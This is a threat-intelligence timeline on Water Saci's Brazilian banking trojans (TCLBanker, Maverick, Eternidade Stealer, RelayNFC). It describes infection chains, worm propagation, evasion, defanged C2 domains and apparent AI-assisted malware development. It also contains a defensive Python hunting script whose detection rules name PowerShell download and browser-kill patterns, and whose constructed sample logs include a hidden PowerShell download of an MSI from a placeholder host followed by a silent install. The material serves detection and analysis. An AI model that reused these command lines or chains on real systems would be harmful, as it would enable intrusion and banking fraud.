TCLBanker Evolution: Water Saci Expands WhatsApp/Outlook Campaign Targeting 59 Brazilian Banks and Fintech Platforms
Summary
A new trojan named TCLBanker, which targets 59 banking, fintech, and cryptocurrency platforms, has emerged as a major evolution of the older Maverick/SORVEPOTEL malware family. The malware spreads via WhatsApp and Outlook using self-spreading worm modules that automatically infect new victims, primarily in Brazil, but with potential for regional expansion. TCLBanker is loaded via DLL side-loading within a legitimate Logitech application, avoiding detection by security products. The banking module monitors browser activity in real-time, enabling remote control operations including live screen streaming, keylogging, and clipboard hijacking, while using sophisticated overlay systems to harvest credentials and financial data. The malware's WhatsApp worm module hijacks authenticated sessions to harvest contacts and send spam messages, while the Outlook worm module abuses COM automation to distribute phishing emails. The threat actor behind TCLBanker, identified as Water Saci, has incorporated advanced evasion techniques and may have used AI tools during development, further refining its capabilities beyond earlier iterations like SORVEPOTEL and Maverick.
Timeline
03.12.2025 17:32 · 2 articles
Water Saci Uses Sophisticated Infection Chain to Deploy Banking Trojan
The threat actor Water Saci is using a sophisticated, highly layered infection chain that uses HTML Application (HTA) files and PDFs to propagate a worm that deploys a banking trojan via WhatsApp in attacks targeting users in Brazil. The latest wave is characterized by the attackers shifting from PowerShell to a Python-based variant that spreads the malware in a worm-like manner over WhatsApp Web. The PDF lure instructs victims to update Adobe Reader by clicking on an embedded link. Users who receive HTA files are deceived into executing a Visual Basic Script immediately upon opening, which then runs PowerShell commands to fetch two next-stage payloads from a remote server: an MSI installer for the trojan and a Python script responsible for spreading the malware via WhatsApp Web.

The MSI installer serves as a conduit for delivering the banking trojan using an AutoIt script. The script also runs checks to ensure that only one instance of the trojan is running at any given time: it verifies the presence of a marker file named "executed.dat" and, if the file does not exist, creates it and notifies an attacker-controlled server ("manoelimoveiscaioba[.]com"). The script analyzes the user's Google Chrome browsing history to search for visits to banking websites, specifically a hard-coded list comprising Santander, Banco do Brasil, Caixa Econômica Federal, Sicredi, and Bradesco. It then proceeds to another critical reconnaissance step: checking for installed antivirus and security software and harvesting detailed system metadata. The main functionality of the malware is to monitor open windows and extract their window titles to compare them against a list of banks, payment platforms, exchanges, and cryptocurrency wallets.

If any of these windows contain keywords related to targeted entities, the script looks for a TDA file dropped by the installer, decrypts it, and injects it into a hollowed "svchost.exe" process, following which the loader searches for an additional DMP file containing the banking trojan. The banking trojan deployed is not Maverick, but rather malware that exhibits structural and behavioral continuity with Casbaneiro. The trojan carries out "aggressive" anti-virtualization checks to sidestep analysis and detection, and gathers host information through Windows Management Instrumentation (WMI) queries. It modifies the Registry to set up persistence and establishes contact with a C2 server ("serverseistemasatu[.]com") to send the collected details and receive backdoor commands that grant remote control over the infected system. The trojan forcibly terminates several browsers to force victims to reopen banking sites under "attacker-controlled conditions."

The second aspect of the campaign is the use of a Python script, an enhanced version of its PowerShell predecessor, to deliver the malware to every contact via WhatsApp Web sessions using the Selenium browser automation tool. There is "compelling" evidence to suggest that Water Saci may have used a large language model (LLM) or code-translation tool to port their propagation script from PowerShell to Python, given the functional similarities between the two versions and the inclusion of emojis in console outputs.

TCLBanker represents a further evolution in Water Saci's capabilities, incorporating the actor's signature infection techniques while introducing new propagation vectors (Outlook) and significantly enhanced remote control features. The malware's advanced evasion techniques, including environment-dependent payload decryption and persistent watchdog threads against analysis tools, demonstrate the continuing refinement of the threat actor's toolkit.
Sources:
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
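As an added illustration, not code from the original page or from any of the cited reports, the following Python snippet turns the infection-chain stages described in the entry above into simple hunting rules and runs them over constructed process-creation records: a script host (HTA/VBS) spawning a downloading PowerShell, PowerShell launching a silent MSI install, an AutoIt script running from a user-writable path, svchost.exe with a parent other than services.exe (the hollowing target), and forced browser termination. The record fields (modelled loosely on Sysmon process-creation data), host names, file paths and the URL are assumptions for this example, not indicators from the reports. The rules generalise slightly beyond the text by requiring several distinct stages on one host before escalating, which keeps a lone silent MSI install or a lone taskkill from paging anyone.

```python
# Added example: hunting rules for the Water Saci / TCLBanker chain stages
# described above, run over constructed process-creation records.
# Not code from the page or any cited report; field names, hosts, paths and
# the URL are assumptions made for this example.
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str      # endpoint that reported the event (constructed name)
    parent: str    # parent image file name, e.g. "mshta.exe"
    image: str     # image file name of the new process
    cmdline: str   # full command line


SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "opera.exe", "brave.exe"}
# Substrings that indicate PowerShell is pulling content from the network.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "iwr ", "net.webclient", "start-bitstransfer")
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\public\\")


def stage_of(ev: ProcessEvent):
    """Return the name of the chain stage the event matches, or None."""
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()
    # Stage 1: HTA/VBS lure spawns PowerShell that fetches next-stage payloads.
    if (parent in SCRIPT_HOSTS and image == "powershell.exe"
            and any(m in cmd for m in DOWNLOAD_MARKERS)):
        return "script-host-powershell-download"
    # Stage 2: PowerShell installs the fetched MSI silently.
    if (parent == "powershell.exe" and image == "msiexec.exe"
            and "/i" in cmd and ("/qn" in cmd or "/quiet" in cmd)):
        return "powershell-silent-msi"
    # Stage 3: AutoIt interpreter or .a3x script run from a user-writable path
    # (the MSI drops an AutoIt script). Heuristic: the interpreter is often renamed.
    if ((image.startswith("autoit") or ".a3x" in cmd)
            and any(p in cmd for p in USER_WRITABLE)):
        return "autoit-user-writable-path"
    # Stage 4: svchost.exe as a hollowing target. Legitimate instances are
    # children of services.exe, so any other parent deserves a look.
    if image == "svchost.exe" and parent != "services.exe":
        return "svchost-unusual-parent"
    # Stage 5: the trojan kills browsers so victims re-open banking sites.
    if image == "taskkill.exe" and any(b in cmd for b in BROWSERS):
        return "browser-kill"
    return None


def triage(events, min_stages=2):
    """Group stage hits per host; escalate hosts showing >= min_stages stages."""
    hits = defaultdict(list)
    for ev in events:
        stage = stage_of(ev)
        if stage:
            hits[ev.host].append(stage)
    return {host: {"stages": sorted(set(stages)),
                   "escalate": len(set(stages)) >= min_stages}
            for host, stages in hits.items()}


# Constructed sample telemetry (not real indicators): WS01 shows the chain,
# WS02 only routine activity that must not fire.
SAMPLE_EVENTS = [
    ProcessEvent("WS01", "mshta.exe", "powershell.exe",
                 "powershell.exe -w hidden -c (New-Object Net.WebClient)"
                 ".DownloadFile('http://stage.example.invalid/u.msi',"
                 "'C:\\Users\\v\\AppData\\Local\\Temp\\u.msi')"),
    ProcessEvent("WS01", "powershell.exe", "msiexec.exe",
                 r"msiexec.exe /i C:\Users\v\AppData\Local\Temp\u.msi /qn"),
    ProcessEvent("WS01", "msiexec.exe", "autoit3.exe",
                 r"C:\Users\v\AppData\Roaming\upd\autoit3.exe "
                 r"C:\Users\v\AppData\Roaming\upd\run.a3x"),
    ProcessEvent("WS01", "autoit3.exe", "svchost.exe",
                 r"C:\Windows\System32\svchost.exe"),
    ProcessEvent("WS01", "autoit3.exe", "taskkill.exe", "taskkill /F /IM chrome.exe"),
    ProcessEvent("WS02", "services.exe", "svchost.exe", "svchost.exe -k netsvcs -p"),
    ProcessEvent("WS02", "explorer.exe", "powershell.exe",
                 r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcessEvent("WS02", "cmd.exe", "taskkill.exe", "taskkill /F /IM notepad.exe"),
]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_EVENTS).items():
        print(host, verdict)
```

Run on the sample, WS01 is escalated with all five stages present and WS02 produces no hits at all. The svchost parent rule is deliberately coarse and will surface some benign activity on its own; that is why the escalation decision is made on the count of distinct stages per host rather than on any single rule.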
03.12.2025 17:32 · 2 articles
RelayNFC Android Malware Targets Brazilian Banking Users
The development comes as Brazilian banking users are also being targeted by a previously undocumented Android malware dubbed RelayNFC that's designed to carry out Near-Field Communication (NFC) relay attacks and siphon contactless payment data. RelayNFC implements a full real-time APDU relay channel, allowing attackers to complete transactions as though the victim's card were physically present. The malware is built using React Native and Hermes bytecode, which complicates static analysis and helps evade detection. Primarily spread via phishing, the attack makes use of decoy Portuguese-language sites (e.g., "maisseguraca[.]site") to trick users into installing the malware under the pretext of securing their payment cards. The end goal of the campaign is to capture the victim's card details and relay them to attackers, who can then perform fraudulent transactions using the stolen data. The cybersecurity company said its investigation also uncovered a separate phishing site ("test.ikotech[.]online") that distributes an APK file with a partial implementation of Host Card Emulation (HCE), indicating that the threat actors are experimenting with different NFC relay techniques.
Sources:
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
19.11.2025 17:00 · 4 articles
Eternidade Stealer Trojan Targets Brazilian Financial Institutions
The campaign leverages a combination of social engineering and WhatsApp hijacking to distribute the trojan, using an obfuscated Visual Basic Script to drop a batch script that delivers two payloads: a Python script for WhatsApp Web-based dissemination and an MSI installer for Eternidade Stealer. The Python script establishes communication with a remote server and uses WPPConnect to automate the sending of messages in hijacked accounts via WhatsApp. The malware harvests a victim's entire contact list, filters out groups, business contacts, and broadcast lists, and sends a malicious attachment to all contacts. The MSI installer drops several payloads, including an AutoIt script that checks if the compromised system is based in Brazil by inspecting the operating system language. The script scans running processes and registry keys to ascertain the presence of installed security products and profiles the machine, sending details to a C2 server. The malware injects the Eternidade Stealer payload into 'svchost.exe' using process hollowing. Eternidade Stealer continuously scans active windows and running processes for strings related to banking portals, payment services, and cryptocurrency exchanges and wallets. The malware uses a terra.com[.]br email address to fetch C2 details, mirroring a tactic recently adopted by Water Saci. The campaign's backend was traced to two panels, one for managing the Redirector System and another login panel, used to monitor infected hosts. TCLBanker incorporates similar WhatsApp hijacking techniques but expands the propagation vectors to include Outlook via COM automation, representing an evolution in the campaign's delivery mechanisms while maintaining the focus on Brazilian financial targets.
Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
11.11.2025 20:37 · 4 articles
SORVEPOTEL Linked to Maverick Banking Malware
New findings reveal that SORVEPOTEL is linked to a banking malware called Maverick, which targets Brazilian banks and monitors active browser window tabs for URLs matching financial institutions. The malware uses IMAP connections to terra.com[.]br email accounts using hardcoded email credentials to retrieve commands and implements a sophisticated remote control mechanism that allows the adversary to pause, resume, and monitor the WhatsApp propagation in real-time. TCLBanker represents a major evolution of the Maverick/SORVEPOTEL malware family, incorporating advanced features while maintaining the core targeting of Brazilian financial institutions. The malware expands the banking module to 59 targeted platforms and introduces sophisticated remote control capabilities including live screen streaming, keylogging, and clipboard hijacking. The malware's development shows signs of AI-assisted coding, with researchers noting code artifacts suggesting AI involvement in creating the loader and propagation modules.
Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
03.10.2025 15:02 · 5 articles
SORVEPOTEL Malware Spreads via WhatsApp in Brazil
The malware spreads through phishing messages with malicious ZIP file attachments on WhatsApp, primarily affecting Windows systems. The campaign is designed for rapid propagation rather than data theft or ransomware. The malware exploits trust in WhatsApp to spread across contacts and groups, leading to account bans for excessive spam. The majority of infections are concentrated in Brazil, impacting various sectors including government, public service, and technology. New developments introduce TCLBanker, a significantly evolved malware that builds upon the SORVEPOTEL foundation. TCLBanker targets 59 banking, fintech, and cryptocurrency platforms via a trojanized MSI installer for Logitech AI Prompt Builder. The installer uses DLL side-loading within a legitimate Logitech application to evade detection while executing malicious payloads. The malware introduces autonomous self-spreading capabilities through WhatsApp and Outlook, including session hijacking, contact harvesting, and phishing email distribution. The WhatsApp worm module exploits authenticated Web sessions to send spam messages to Brazilian contacts, while the Outlook worm module abuses COM automation to distribute malicious emails.
Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
Information Snippets
SORVEPOTEL spreads through phishing messages with malicious ZIP file attachments on WhatsApp.
First reported: 03.10.2025 15:02 · 3 sources, 5 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
The malware targets Windows systems and is designed for rapid propagation.
First reported: 03.10.2025 15:02 · 3 sources, 5 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
The campaign primarily affects Brazilian users, with 457 out of 477 infections concentrated in Brazil.
First reported: 03.10.2025 15:02 · 2 sources, 4 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The malware uses a Windows shortcut (LNK) file to execute a PowerShell script.
First reported: 03.10.2025 15:02 · 3 sources, 5 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
The malware establishes persistence by copying itself to the Windows Startup folder.
First reported: 03.10.2025 15:02 · 2 sources, 4 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The malware communicates with a C2 server to fetch further instructions or additional malicious components.
First reported: 03.10.2025 15:02 · 3 sources, 5 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
The malware spreads through WhatsApp Web, leading to account bans for excessive spam.
First reported: 03.10.2025 15:02 · 3 sources, 5 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
The campaign impacts various sectors including government, public service, manufacturing, technology, education, and construction.
First reported: 03.10.2025 15:02 · 2 sources, 4 articles. Sources:
- Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL — thehackernews.com — 03.10.2025 15:02
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
Maverick malware targets Brazilian banks and monitors active browser window tabs for URLs matching financial institutions.
First reported: 11.11.2025 20:37 · 3 sources, 5 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
Maverick is spread via WhatsApp Web and is linked to the SORVEPOTEL malware.
First reported: 11.11.2025 20:37 · 3 sources, 5 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
The malware uses a Windows shortcut (LNK) file to execute a PowerShell script that connects to an external server to download the first-stage payload.
First reported: 11.11.2025 20:37 · 3 sources, 4 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
The PowerShell script disables Microsoft Defender Antivirus and UAC, and retrieves a .NET loader.
First reported: 11.11.2025 20:37 · 2 sources, 3 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The loader features anti-analysis techniques and downloads the main modules of the attack: SORVEPOTEL and Maverick.
First reported: 11.11.2025 20:37 · 2 sources, 4 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
Maverick is only installed after ensuring the victim is located in Brazil by checking the time zone, language, region, and date and time format.
First reported: 11.11.2025 20:37 · 3 sources, 4 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
The malware is used to target hotels in Brazil, indicating a possible expansion of targeting.
First reported: 11.11.2025 20:37 · 1 source, 2 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The malware uses IMAP connections to terra.com[.]br email accounts using hardcoded email credentials to retrieve commands.
First reported: 11.11.2025 20:37 · 3 sources, 5 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
The malware implements a sophisticated remote control mechanism that allows the adversary to pause, resume, and monitor the WhatsApp propagation in real-time.
First reported: 11.11.2025 20:37 · 3 sources, 4 articles. Sources:
- WhatsApp Malware 'Maverick' Hijacks Browser Sessions to Target Brazil's Biggest Banks — thehackernews.com — 11.11.2025 20:37
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- New TCLBanker malware self-spreads over WhatsApp and Outlook — www.bleepingcomputer.com — 08.05.2026 01:06
Eternidade Stealer combines a WhatsApp-propagating worm, a Delphi-based stealer, and an MSI dropper to harvest financial data, system details, and contact lists.
First reported: 19.11.2025 17:00 · 2 sources, 3 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The malware uses an obfuscated VBScript to download two payloads: a Python-written WhatsApp worm and an installer that deploys a Delphi-built banking Trojan.
First reported: 19.11.2025 17:00 · 2 sources, 3 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The Eternidade Stealer component activates only on systems using Brazilian Portuguese and scans for banking, fintech, and cryptocurrency applications before triggering credential-harvesting overlays.
First reported: 19.11.2025 17:00 · 2 sources, 3 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The malware stores hard-coded email credentials that allow it to pull fresh C2 details from an IMAP mailbox for extra resilience against takedowns.
First reported: 19.11.2025 17:00 · 2 sources, 3 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The dropper installs several components, including AutoIt-based scripts that perform reconnaissance, detect antivirus tools, gather system telemetry, and decrypt embedded payloads.
First reported: 19.11.2025 17:00 · 2 sources, 2 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The stealer checks for prior infection, collects host information and browser window details, and targets applications from banks such as Itaú, Santander, Bradesco, and Caixa, along with services like MercadoPago and Binance.
First reported: 19.11.2025 17:00 · 2 sources, 3 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The campaign's backend was traced to several related domains and panels used for redirect management and victim tracking.
First reported: 19.11.2025 17:00 · 2 sources, 2 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
Logs showed 454 connection attempts from 38 countries, with only a handful originating in Brazil, despite the malware’s regional focus.
First reported: 19.11.2025 17:00 · 2 sources, 3 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
Most visitors used desktop systems, suggesting that the campaign was designed for workstation environments rather than mobile endpoints.
First reported: 19.11.2025 17:00 · 2 sources, 3 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
The campaign leverages a combination of social engineering and WhatsApp hijacking to distribute a Delphi-based banking trojan named Eternidade Stealer.
First reported: 19.11.2025 17:35 · 1 source, 2 articles. Sources:
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
